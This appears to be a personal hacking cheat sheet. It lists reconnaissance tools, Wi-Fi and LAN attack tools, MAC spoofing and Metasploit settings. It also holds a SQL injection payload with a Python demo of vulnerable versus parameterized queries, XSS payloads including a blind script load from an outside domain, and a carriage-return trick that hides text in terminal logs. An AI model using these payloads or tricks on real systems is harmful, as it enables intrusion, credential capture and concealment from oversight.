
Hacking Basic Tools

KABA key set

https://www.fischer-faeh-kaba8.ch/produkt/schluessel-set-kaba-8-profi-9-schluessel/


Reconnaissance


nmap

Scan ports

nmap -sS -sV -v -O <ip>

Add -p- to scan all 65535 TCP ports instead of the default top 1000.

Scanning with a vulnerability script:

sudo nmap -sV --script vulners <target>

telnet

To gather basic server information (banner, headers), telnet to port 80 and type:

HEAD / HTTP/1.0

Hit enter twice.

Nikto

Vulnerability scanner for websites

whatweb

Identifies the technologies (web server, CMS, frameworks) running on a website

wapiti

Vulnerability scanner for websites

droopescan

Vulnerability scanner for CMS websites https://github.com/droope/droopescan

pip3 install droopescan

moodlescan

Vulnerability scanner for the moodle webapp

https://github.com/inc0d3/moodlescan

Lynis

Vulnerability scanner for systems (local and remote)

wash

Scan for WPS enabled routers

Metasploit HTTP scans

https://www.offensive-security.com/metasploit-unleashed/scanner-http-auxiliary-modules/

msfconsole

Routersploit

Framework for router pentesting. Command is rsf.

gobuster

Scan webserver directories

gobuster dir -u http://<ip>:3333 -w <word list location> -l

-q to hide the banner and progress output

Check for SQL injection

https://www.softwaretestinghelp.com/sql-injection-how-to-test-application-for-sql-injection-attacks/

' or 1=1;--

Try the payload with different quote characters, since the query may use any of them:

" ' ´
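The effect of the ' or 1=1;-- payload on a concatenated query, beside the parameterized form that defeats it, as an added example that is not from the original page; it uses Python's sqlite3 module and a constructed in-memory users table.

```python
import sqlite3

def make_db():
    # Constructed sample data: two users, one of them an admin.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")])
    return con

def login_vulnerable(con, user, password):
    # Builds the SQL by string formatting. The payload ' or 1=1;-- closes the
    # quoted literal, adds an always-true condition and comments out the rest
    # of the statement, so the WHERE clause matches every row.
    sql = ("SELECT name, role FROM users WHERE name = '%s' AND password = '%s'"
           % (user, password))
    return con.execute(sql).fetchall()

def login_safe(con, user, password):
    # Bound parameters: the driver hands the payload to SQLite as data, so its
    # quote and comment characters never reach the SQL parser.
    sql = "SELECT name, role FROM users WHERE name = ? AND password = ?"
    return con.execute(sql, (user, password)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "' or 1=1;--", ""))  # both rows
    print("safe:      ", login_safe(db, "' or 1=1;--", ""))        # no rows
```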

XSS - Cross site scripting

Source: https://www.bugbountyhunter.com/vulnerability/?type=xss

Different types of XSS

  • Stored XSS is when the XSS payload is stored in the website's database and reflected back to users. For example, imagine your Twitter name: it is stored and displayed to other users.
  • Reflective XSS is when the payload is reflected in the source via a parameter in the URL/request, either via a GET or a POST request.
  • DOM XSS is XSS executing from the DOM, usually injected via hash fragments, for example #q=<svg/onload=alert(0)>
  • Self XSS is XSS that only affects you. This could be in your account settings that only you can access. For these types of XSS I recommend looking for CSRF login for chaining.
  • Blind XSS is an XSS payload that fires blindly, for example on an admin's backend. Imagine you have ordered some food and you add to the notes <script src=//zseano.com/>; when the restaurant opens your order, the XSS payload may fire.

Start with something small, like an <h2> tag in your input; <script> will most likely be filtered.

Windows CMD commands

See all user accounts on the domain

net user /domain

See all groups on the domain

net group /domain

See all members of a group

net group <groupname> /domain

Attacking


Hiding text

A carriage return (\r) moves the cursor back to the start of the line, so whatever is printed after it overwrites the text already on that line. This hides the earlier text when the output is viewed in a terminal, even though it is still present in the file or log.

responder

Captures password hashes from hosts looking up network drives on the local network

fluxion

Captures the WPA 4-way handshake and runs an evil twin attack

wifite

Wireless auditor which uses different tactics to get into a Wi-Fi network

reaver & bully

Tools to get a Wi-Fi password by cracking the WPS PIN. Reaver seems to be unreliable with some Ralink chips.

Metasploit WebDAV exploitation

https://resources.infosecinstitute.com/topic/learning-pentesting-metasploitable3-exploiting-webdav/
https://charlesreid1.com/wiki/Metasploitable/Apache/DAV

Detection


rkhunter

Rootkit detection

ClamAV

Malware detection

Full system scan:

sudo clamscan --recursive --infected --exclude-dir='^/sys|^/dev' /

Maintaining access


Maintaining access - tutorialspoint

Other


Change MAC address

Take Down Network Interface

You'll want to take your network device offline to change your MAC address:

ifconfig eth0 down

or if you're using wireless,

ifconfig wlan2 down

Change Your MAC

Change it to something random:

macchanger -r eth0

Bring Up Your Network Interface

Time to bring your network device back online:

ifconfig eth0 up

Check To Make Sure

ifconfig

Metasploit exploit over NAT

If we don't want the Meterpreter handler to fall back to listening on 0.0.0.0, we can use one of the "advanced" options and tell it to bind to the LAN IP address:

msf exploit(ms13_069_caret) > set ReverseListenerBindAddress 192.168.0.187
ReverseListenerBindAddress => 192.168.0.187